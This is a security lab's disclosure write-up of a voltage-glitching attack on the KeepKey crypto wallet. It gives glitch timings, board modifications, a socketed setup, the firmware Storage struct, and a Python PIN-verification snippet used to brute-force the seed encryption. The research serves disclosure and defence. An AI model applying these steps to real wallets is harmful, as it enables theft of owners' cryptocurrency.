December 10, 2019 | Security

Inside Kraken Security Labs: Flaw Found in Keepkey Crypto Hardware Wallet (Part 2)

Although much of the original KeepKey codebase is based on the Trezor One, their codebases have diverged. The KeepKey team added several mitigation mechanisms to make the KeepKey firmware resilient to the glitching attacks demonstrated during the Wallet.Fail talk at 35th Chaos Communications Congress; however, these were proven to be ineffective. The specific glitch used against the KeepKey was based on the Wallet.Fail and Chip.Fail talk at Blackhat USA 2019. Most importantly, this research demonstrates that the security of a wallet like the KeepKey should not solely be based on the security of the STM32F205 microcontroller.

STM32 Boot process and Glitch Parameters

Much of the behavior of a microcontroller is defined by values it reads at power up. These include strapped pins that are read at boot (BOOT pins in the STM32 documentation) and the security configuration bits (Option Bytes in the STM32 documentation). Note, many of the following details have been determined through empirical reverse-engineering of the boot behavior of the STM32F2. Most Cortex-M microcontrollers contain ROMs that are executed at boot, commonly referred to as BootROMs. BootROMs are the first pieces of software executed by a chip and are responsible for loading important parameters, such as the security configuration of the chip. Subsequently, the user application or application code is executed. In the case of the hardware wallet, this is the actual firmware of the manufacturer. Note, because the glitching attack described in this work targets the BootROM code, it cannot be reliably mitigated by any countermeasures implemented in the vendor’s firmware. A vulnerability in the BootROM leads to an inherent hardware vulnerability that cannot be patched and requires the underlying hardware to be replaced completely with a new hardware revision.

Presumably because of the relative complexity of the STM32F2, the STM32 takes very long to boot, approximately 1.2ms – 1.8ms after power cycling the power supply to the chip. The boot time can be reliably measured in two ways: either measuring the power consumption of the device and measuring the amount of time that it takes for an initial rise in power consumption ( for example, with a [Low Side Power Measurement]), or by observing the behavior of the reset (NRST/JTAG RST) line of the microcontroller. Within the first 100us – 200us, the BootROM of the chip is executed.

Flash and SRAM Read Protection on the STM32

The STM32 family implements a security mechanism known as Read Protection or RDP. Because the only non-volatile storage on ARM Cortex-M devices is flash memory, the RDP value is stored in a special page of flash memory that is otherwise inaccessible for writing from the application code. The RDP value is defined by the microcontroller configuration bits known as Option Bytes. There are three Option Byte values corresponding to the three RDP levels on STM32 devices.

RDP Level	Option Byte Value	Behavior
0	0xAA	Full access to SRAM and Flash
1	Any value except 0xAA and 0xCC	Read access to SRAM, no access to Flash
2	0xCC	No access to SRAM or Flash

Table 1: RDP Levels and the corresponding Option Byte Values on STM32-Family Devices

Since the only non-volatile memory on STM32 microcontrollers is flash, this is also the only non-volatile storage for the cryptographic seeds and private keys. As a result, the flash must be protected from read out. Fortunately, the Trezor One and all of its derivatives correctly utilize the RDP feature and are shipped with and/or set RDP to RDP Level 2 on first boot (see Table 1). As a result, in practice, non-development firmwares on user devices are always at RDP2 (RDP Level 2), which prevents an attacker from accessing SRAM or Flash. However, as demonstrated by the Wallet.Fail and Chip.Fail research, downgrading RDP2 to RDP1 can reliably be performed at boot with voltage glitching. Once a device is at RDP1, its SRAM can be read out over the ARM SWD debugging protocol.

Because of the complex Power-On-Reset (POR) logic of the STM32, a normal assertion of reset, (i.e. soft reset where the NRST line is held low for a short amount of time) does not result in a full power-on-reset and re-execution of the BootROM. This is also somewhat confirmed by the fact that a change in the security configuration (i.e. changing the Option Bytes to change the RDP Level) generally requires power cycling the chip. Conversely, this also means that once a chip is successfully glitched and a resulting downgrade of the security configuration has taken place, this security downgrade will remain in effect until the chip is power-cycled. This means that an attacker can repeatedly attempt to glitch the device, check whether the glitch was successful, while still executing Bootrom or very early into the application code without the application code loading. As a result, there are no countermeasures that are effective against this class of attack because the attacker can assure the glitch succeeded before executing the application code. Once an attacker successfully glitches a device, the attacker simply performs a soft reset of the target, the system continues to run at RDP1, allowing the attacker to arbitrarily read the contents of SRAM memory at any given point in time. This is particularly problematic as many of the libraries implementing the cryptography necessary for signing cryptocurrency transactions rely on loading sensitive information into SRAM for computation. Additionally, the cryptographic seed may be loaded into SRAM during wallet derivation and the PIN of the user may be loaded for verification against user input. If the underlying firmware is verified or if a checksum is computed to check the integrity of the firmware, parts or all of this data may also be exposed to attacks.

Defeating KeepKey Countermeasures

The KeepKey implemented several countermeasures against glitching attacks following the Wallet.Fail talk at 35c3. These include magic byte patterns in the flash as well as encrypting the seed in memory. Neither of these countermeasures were determined to be effective. Because an attacker can ensure that a glitch succeeded before executing the user application, it is trivial to prevent any magic bytes of flash from being corrupted. Moreover, since the encryption key is directly derived from the user’s PIN, the keyspace is small, especially for 4 digit PINs. Hence, the encryption key can be brute-forced in a fraction of a second on any modern PC, allowing an attacker to recover the unencrypted PIN and cryptographic seed.

Glitch setup

An in-situ glitching setup for the KeepKey

Boot times for a specific chip, i.e. a specific microcontroller of a specific KeepKey, depend on several parameters and unique characteristics of the microcontroller. These include manufacturing variances of the silicon in the microcontroller as well as variances in the capacitances of the PCB, the temperature, as well as the voltages supplied to the device. To remove some of the external variances it is necessary to modify the PCB to remove any external components that may adversely affect the glitch waveform supplied to the target. Alternatively, a custom PCB can be used that lacks these external components.

The previous Wallet.fail and Chip.fail research presentations demonstrated that a successful glitch against the STM32 can be performed by supplying a glitch to the Vcore voltage of the microcontroller. To successfully perform the glitch the target is power-cycled, and a glitch waveform is supplied after system boot (when the NRST line goes high) to the Vcore pins of the microcontroller. Because the offset in time at which the Option Bytes are loaded is unknown and depends on the unique manufacturing characteristics of the silicon as well as external parameters such as temperature, it is easier to create a search space of varying delays and iteratively perform the following steps:

Power-cycle the target
Delay for a given amount of time
Perform the glitch
Attempt to enumerate the taps of the JTAG interface
If no taps could be enumerated, increase the delay and repeat from Step 1

A Python script was used for automation and a FPGA was used to accurately control power-cycling the target, delaying and supplying the glitch select signal to the multiplexer (i.e. glitching the target). After every glitch attempt, the JTAG interface was enumerated. If JTAG could be enumerated, the glitch had succeeded.

Info : JTAG tap: auto0.tap tap/device found: 0x4ba00477 (mfg: 0x23b (ARM Ltd.), part: 0xba00, ver: 0x4) Info : JTAG tap: auto1.tap tap/device found: 0x06411041 (mfg: 0x020 (STMicroelectronics), part: 0x6411, ver: 0x0)

Successful JTAG tap enumeration by OpenOCD.

For interfacing to the target’s debugging interfaces, OpenOCD was used. Because debugging the chip over the ARM SWD interface results in a Non-Maskable Interrupt (NMI), halting the device, JTAG was used instead to test if debugging had been enabled. Successful enumeration of the tap devices meant that debugging had indeed been enabled and that a snapshot of SRAM memory can subsequently be captured over ARM SWD. Note: ARM SWD still generates an NMI halting the device. For this reason, JTAG enumeration was used in conjunction with ARM SWD, since JTAG did not result in an NMI.

On the multiple devices tested as part of this research, successful glitching and downgrading of RDP occurred approximately 160us – 200us after the NRST line had gone high. For glitching, a 200ns pulse was supplied to the select line of a Max4619 analog multiplexer. The Max4619 toggled between approximately 1.38v, which was supplied to ensure that the Low-Dropout Regulator (LDO) in the STM32 shut off, and 0v (i.e. GND).

In-Situ Glitch

Creating a custom PCB to glitch a device requires additional time and effort, although it results in more reproducible results, with less preparation per device, when performed against many devices en mass. Hence, as a proof of concept, it makes sense to first modify a stock target PCB and adapt it to work with the glitch setup. Most notably, any components that can filter or impact the glitch pulse from reaching the target microcontroller. Most important among these are the bypass capacitors that are added to stabilize the voltage supplied to the microcontroller.

Necessary modifications to the KeepKey PCB for in-situ glitching

On the KeepKey PCB, R42 and R43 are the bypass capacitors for the core voltage of the microcontroller and must be removed. Additionally, there is a sequencer IC U4 that ensures a stable voltage and delays the microcontroller from booting. This additional startup delay makes the process of iteratively glitching the target more slow, hence it should also be removed. Additionally, the sequencer circuit has two series resistors connected to it and NRST, R50 and R63, respectively. R50 should be removed, while R63 needs to be bridged and/or removed and bridged for reliable glitching.

A modified KeepKey PCB

Socketed Glitch Setup

The Wallet.fail Presentation at 35c3 demonstrated a socketed STM32 glitcher. This included a custom PCB with a mechanical socket compatible with the LQFP64 package of the STM32F205 used in the Trezor One and the KeepKey. The STM32F205 can be inserted into the socket without soldering. As a result, in-situ modifications become entirely unnecessary. The MCU can simply be removed from the KeepKey board and then physically inserted into the socket adapter in under one minute. There is no rewiring to be performed for subsequent devices as the underlying PCB of the socketed setup provides all the necessary connections.

The following attack was successfully executed using the socketed setup. First, we upgraded the KeepKey to the latest firmware and a BIP39 seed phrase was generated and recorded. Subsequently, a wallet was created to later verify that the attack was indeed successful and a small amount of cryptocurrency was transferred to the wallet. Once the KeepKey wallet was created, we then removed the MCU from the KeepKey and placed it into the socket. Because the bootloader of the KeepKey initializes internal clocks using the internal PLL, it requires an external 8MHz oscillator to run. The system failed to boot without an external clock source. However, a signal generator was used to supply the necessary clock waveform as per the STM32F205 datasheet. Once the external clock was supplied, the bootloader was able to initialize internal clocks and continue booting in the socket. If a signal generator was not available, the PCB provided the footprints for mounting a quartz oscillator and the corresponding capacitors.

With the system properly clocked, the MCU in the socket boots are to the same state as the in-situ setup. Therefore, the glitch can now be applied, RDP downgraded from RDP Level 2 to RDP Level 1 and the user application can be executed. Once the user application is executed, the encrypted BIP39 seed phrase and the PIN are loaded into memory. At this stage, it is possible to verify that RDP Level 1 is still active by enumerating the JTAG tap devices and subsequently capturing a snapshot of SRAM by writing the SRAM contents to a file.

The socketed setup is an alternative seed extraction method with identical results to that of the in-situ glitch. It is invasive but not fully destructive as the MCU can be reworked and replaced on the original board and the case reassembled. Note, the KeepKey enclosure is particularly difficult to open in practice, but after some practice, it can be quickly performed with minimal damage to the outside as there are mechanical snaps holding the upper and lower enclosure together. However, once the seed has been extracted, an attacker could restore the BIP39 seed phrase on any other wallet that supports BIP39. If the intent of the attacker was to gain a user’s seed to steal the user’s funds at a later point in time, an attacker could restore the seed onto a brand new KeepKey device and return the new KeepKey unbeknownst to the victim.

Extracting the Secrets

The downgrade attack from RDP2 to RDP1 on its own is not enough to compromise the seed of the wallet: RDP1 only allows read-out of the RAM, while the seed is normally stored in flash. To compromise the seed, it was necessary to find a code-path that loads the seed into RAM without having to authenticate, using the PIN first, to then read it out using the debugging interface.

A manual code-review revealed that the KeepKey firmware loads all configuration data (including an encrypted version of the seed) into memory on a regular boot and before entering the PIN.

The full code-path that leads to this is:

lib/firmware/keepkey_main.c: main
lib/firmware/storage.c: storage_init
lib/firmware/storage.c storage_fromFlash

The structure that is loaded into RAM is called Storage:

typedef struct _Storage { uint32_t version; struct Public { uint8_t wrapped_storage_key[64]; uint8_t storage_key_fingerprint[32]; bool has_pin; uint32_t pin_failed_attempts; bool has_language; char language[16]; bool has_label; char label[48]; bool imported; uint32_t policies_count; PolicyType policies[POLICY_COUNT]; bool has_auto_lock_delay_ms; uint32_t auto_lock_delay_ms; bool passphrase_protection; bool initialized; bool has_node; bool has_mnemonic; bool has_u2froot; HDNodeType u2froot; uint32_t u2f_counter; bool no_backup; } pub; bool has_sec; struct Secret { HDNodeType node; char mnemonic[241]; char pin[10]; Cache cache; } sec; bool has_sec_fingerprint; uint8_t sec_fingerprint[32]; uint32_t encrypted_sec_version; uint8_t encrypted_sec[512]; } Storage;

The storage structure consists of:

Storage version number
Public structure containing the label, language and other information about the device
Secret structure, which contains the unencrypted seed etc. after the device has been unlocked
sec_fingerprint containing the fingerprint of the encrypted storage
encrypted_sec, a 512 byte long encrypted container that gets decrypted into the Secret structure after a successful pin unlock.

A simple Synalize It! grammar was written for introspecting RAM dumps of the device. It can be used to quickly navigate through the Storage structure:

Synalize It! Pro with a custom grammar to highlight the Storage structure contents

It was found that the Public structure also contains a wrapped_storage_key as well as a storage_key_fingerprint: When a user enters the PIN into the device, the wrapped_storage_key is AES decrypted using the SHA512 hash of the entered PIN. The hash of that decrypted storage key is then compared to the storage_key_fingerprint:

User enters PIN
PIN is stored as C-string ($PIN)
$PIN_SHA_512 = SHA512($PIN)
$KEY = $PIN_SHA_512[0..32]
$IV = $PIN_SHA_512[32..48]
$DECRYPTED_KEY = AES256-CBC($KEY, $IV, $wrapped_storage_key)
If SHA256($DECRYPTED_KEY) == $storage_key_fingerprint
Correct PIN entered

In Python, this can be expressed as:

import hashlib from Crypto.Cipher import AES pin_hash = hashlib.sha512(PIN).digest() key = pin_hash[:32] iv = pin_hash[32:48] cipher = AES.new(key, AES.MODE_CBC, iv) decrypted_wrapped_storage_key = cipher.decrypt(wrapped_storage_key) fingerprint = hashlib.sha256(decrypted_wrapped_storage_key).digest() if(fingerprint == storage_key_fingerprint): # Successful PIN entry

The decrypted wrapped_storage_key (referred to as storage_key in the following description) can then be used to decrypt the encrypted_sec array of the Storage structure. For this, the first 32 bytes of the storage_key are used as the decryption key, while the next 16 bytes are used as IV. The encrypted_sec array can then be decrypted using AES-256 in CBC mode.

Based on this, a Python tool was written that brute-forces the PIN of a memory dump and then extracts the (decrypted) encrypted_sec data into an output file. To improve the performance of the brute-force attack, the tool can utilize multiple processes to take advantage of multiple cores. A KeepKey can have a maximum PIN length of 9 digits. On a modern laptop, attempting all 9-digit PIN combinations takes no longer than 10 minutes. A GPU accelerated version can potentially be significantly faster.